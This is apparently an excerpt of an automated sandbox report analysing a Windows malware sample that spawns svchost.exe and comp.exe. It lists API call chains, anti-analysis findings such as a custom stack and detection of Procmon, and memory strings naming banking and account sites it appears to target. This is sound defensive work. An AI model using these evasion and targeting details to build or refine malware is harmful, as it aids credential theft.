                Source: Binary string: wntdll.pdb source: SpCuEoekPa.exe, 00000000.00000003.1298683128.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1297793424.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1586870712.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1584678539.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1681746683.000000000399E000.00000040.00001000.00020000.00000000.sdmp, comp.exe, comp.exe, 00000007.00000002.3154326804.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1681119916.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3154326804.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, comp.exe, 00000007.00000003.1686241568.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000007.00000002.3155140386.000000000358C000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000000.1758287414.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1990349686.000000000389C000.00000004.80000000.00040000.00000000.sdmp
                Source: SpCuEoekPa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SpCuEoekPa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SpCuEoekPa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SpCuEoekPa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SpCuEoekPa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00364B37 LoadLibraryA,GetProcAddress,0_2_00364B37
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0036C4FE push A30036BAh; retn 0036h0_2_0036C50D
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00388945 push ecx; ret 0_2_00388958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418B23 pushad ; ret 3_2_00418CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041183B push edi; iretd 3_2_0041183C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004180FB pushfd ; retf 3_2_00418116
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041222A push cs; retf 3_2_0041222F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004122B0 push ecx; retf 3_2_004122BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004122BF pushfd ; iretd 3_2_004122C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403350 push eax; ret 3_2_00403352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418C08 pushad ; ret 3_2_00418CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401552 pushfd ; ret 3_2_00401566
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408562 push edi; iretd 3_2_00408563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408572 push esi; ret 3_2_00408573
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00414503 push FFFFFFB7h; iretd 3_2_00414516
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004165F1 push eax; iretd 3_2_00416603
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004015BB pushfd ; ret 3_2_00401566
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00413E7E push ss; retf 3_2_00413E81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408600 push ebp; iretd 3_2_00408601
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040175C pushfd ; ret 3_2_00401778
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418F7A push ecx; iretd 3_2_00418F81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00424FC3 push edi; iretd 3_2_00424FCE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038309AD push ecx; mov dword ptr [esp], ecx3_2_038309B6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F6225F pushad ; ret 7_2_02F627F9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F627FA pushad ; ret 7_2_02F627F9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F6283D push eax; iretd 7_2_02F62858
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F909AD push ecx; mov dword ptr [esp], ecx7_2_02F909B6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02F61368 push eax; iretd 7_2_02F61369
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_006822A2 push FF5A8F7Dh; ret 7_2_006822AF
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0067E4E8 push edi; iretd 7_2_0067E4E9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_006909CB push ebx; retf 7_2_006909CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_00680B2B push ss; retf 7_2_00680B2E
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003648D7
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003E5376
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00383187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00383187
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeAPI/Special instruction interceptor: Address: 1671FF4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\comp.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: SpCuEoekPa.exe, 00000000.00000002.1311195776.0000000001726000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288401290.00000000016BA000.00000004.00000020.00020000.00000000.sdmp, SpCuEoekPa.exe, 00000000.00000003.1288602537.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E rdtsc 3_2_0387096E
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\comp.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\comp.exe TID: 5780Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exe TID: 5780Thread sleep time: -78000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe TID: 6440Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe TID: 6440Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\comp.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C445A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CC6D1 FindFirstFileW,FindClose,0_2_003CC6D1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CC75C
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CEF95
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CF0F2
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CF3F3
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C37EF
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C3B12
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CBCBC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_0068C420 FindFirstFileW,FindNextFileW,FindClose,7_2_0068C420
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003649A0
                Source: 2-64-111.7.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 2-64-111.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 2-64-111.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 2-64-111.7.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696501413x
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctiveuserers.comVMware20,11696501413}
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
                Source: 2-64-111.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 2-64-111.7.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 2-64-111.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 2-64-111.7.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1991808576.000001DC0383E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 2-64-111.7.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: OGbZSCDMTTWQqW.exe, 00000008.00000002.3152536802.000000000093F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 2-64-111.7.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.utiitsl.comVMware20,11696501413h
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 2-64-111.7.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,1169650t7
                Source: 2-64-111.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 2-64-111.7.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 2-64-111.7.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,1169650
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: block list test formVMware20,11696501413
                Source: 2-64-111.7.drBinary or memory string: discord.comVMware20,11696501413f
                Source: comp.exe, 00000007.00000002.3156875239.00000000078DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696501413>!
                Source: 2-64-111.7.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387096E rdtsc 3_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417743 LdrLoadDll,3_2_00417743
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D3F09 BlockInput,0_2_003D3F09
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00363B3A
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00395A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00395A7C
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00364B37 LoadLibraryA,GetProcAddress,0_2_00364B37
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_01672260 mov eax, dword ptr fs:[00000030h]0_2_01672260
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_016722C0 mov eax, dword ptr fs:[00000030h]0_2_016722C0
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_01670C40 mov eax, dword ptr fs:[00000030h]0_2_01670C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E388 mov eax, dword ptr fs:[00000030h]3_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385438F mov eax, dword ptr fs:[00000030h]3_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385438F mov eax, dword ptr fs:[00000030h]3_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828397 mov eax, dword ptr fs:[00000030h]3_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC3CD mov eax, dword ptr fs:[00000030h]3_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A3C0 mov eax, dword ptr fs:[00000030h]3_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038383C0 mov eax, dword ptr fs:[00000030h]3_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov ecx, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE3DB mov eax, dword ptr fs:[00000030h]3_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43D4 mov eax, dword ptr fs:[00000030h]3_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43D4 mov eax, dword ptr fs:[00000030h]3_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038403E9 mov eax, dword ptr fs:[00000030h]3_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F0 mov eax, dword ptr fs:[00000030h]3_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038663FF mov eax, dword ptr fs:[00000030h]3_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A30B mov eax, dword ptr fs:[00000030h]3_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C310 mov ecx, dword ptr fs:[00000030h]3_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850310 mov ecx, dword ptr fs:[00000030h]3_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov ecx, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA352 mov eax, dword ptr fs:[00000030h]3_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D8350 mov ecx, dword ptr fs:[00000030h]3_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D437C mov eax, dword ptr fs:[00000030h]3_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E284 mov eax, dword ptr fs:[00000030h]3_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E284 mov eax, dword ptr fs:[00000030h]3_2_0386E284
